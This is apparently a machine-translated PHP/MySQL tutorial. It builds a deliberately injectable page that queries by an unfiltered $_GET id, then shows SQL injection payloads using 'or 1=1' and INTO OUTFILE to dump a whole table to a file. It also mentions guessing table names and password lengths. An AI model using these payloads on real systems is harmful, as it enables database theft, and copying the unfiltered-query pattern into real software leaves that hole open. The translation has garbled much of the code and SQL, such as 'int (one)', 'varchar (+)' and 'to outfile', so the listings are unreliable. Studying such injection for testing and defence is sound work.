This article with some of their own experience to tell you how hackers friends will use your database SQL vulnerability to download your database Oh, there is a need to reference this article.
Create a table in the database:
The code is as follows |
Copy Code |
CREATE TABLE ' article ' ( ' ArticleID ' int (one) not NULL auto_increment, ' title ' varchar (+) CHARACTER SET UTF8 not NULL DEFAULT ' ', ' Content ' text CHARACTER SET UTF8 not NULL, PRIMARY KEY (' ArticleID ') ) Engine=myisam auto_increment=7 DEFAULT charset=latin1; |
Inserting data into a table I will not post the code, you can download it and import it directly into the database.
Next, write a page that handles user requests, where we deliberately do not filter the data submitted by the user, leaving a SQL injection vulnerability for testing.
The code is as follows:
The code is as follows |
Copy Code |
$servername = "localhost"; $dbusername = "root"; $dbpassword = ""; $dbname = "Test"; $id =$_get[' id '];//id unfiltered $conn =mysql_connect ($servername, $dbusername, $dbpassword) or Die ("database connection failed"); mysql_select_db ($dbname, $conn); mysql_query (' Set names UTF8 '); $sql = "SELECT * from article WHERE articleid= ' $id '"; $result = mysql_query ($sql, $conn); $row = Mysql_fetch_array ($result); echo " dragging libraries with SQL injection vulnerabilities "; if (! $row) { echo "The record does not exist"; Exit } echo "title ". $row [' title ']." "; echo "Content ". $row [' content ']." "; ?> |
We enter it directly in the browser:
The code is as follows |
Copy Code |
Http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1 |
To access a record with ID 1 in the article table
The results of the visit are as follows:
Next, let's take a look at how to download the article table using this vulnerability, which is not known in the case of tool + manual detection.
In the Address bar, enter:
The code is as follows |
Copy Code |
' Into outfile ' e:/sql.txt '%23 |
Analysis:%23 is the ASCII code of #, because in the address bar directly after entering # into the database system will become empty, you need to enter the address bar of 23, then will become #, and then comment out the following SQL statement.
After running, open e-disk, found a sql.txt file, opened, inside is the table article a record.
Why is there only one record? Is there only one record for this data table? No, because we only retrieve a record with ID 1, can i download all the records in the article table once and for all?
The answer is yes, as long as your constructed SQL statement is flexible enough (again, the flexibility to construct SQL statements).
Analysis, when entering ' into outfile ' e:/sql.txt '%23 in the URL address bar, merge into the SQL query statement into:
The code is as follows |
Copy Code |
SELECT * from article WHERE articleid= ' 5 ' into outfile ' e:/whf.txt ' # '
|
After careful analysis, we can construct SQL statements like this:
The code is as follows |
Copy Code |
SELECT * from article WHERE articleid= "or 1=1 into outfile ' e:/whf.txt ' # ' |
In this case, the WHERE clause is always true, in other words, the SQL statement is equivalent to the following:
The code is as follows |
Copy Code |
SELECT * from article to outfile ' E:/whf.txt ' # ' |
Understand, the SQL statement executes the SELECT statement earlier, retrieves all the contents of the table article, and then executes into outfile ' e:/whf.txt ' # ' to guide the content.
If you do not believe, you carry out the following ...
With the SQL injection vulnerability, we can guess the table name, column name, user's password length (left function) and so on, of course, if you can directly to the above demonstration that the data in the table is all exported, there is no need to guess the table name names and so on
http://www.bkjia.com/PHPjc/632941.html www.bkjia.com true http://www.bkjia.com/PHPjc/632941.html techarticle This article with some of their own experience to tell you how hackers friends will use your database SQL vulnerability to download your database Oh, there is a need to reference this article. In the data ...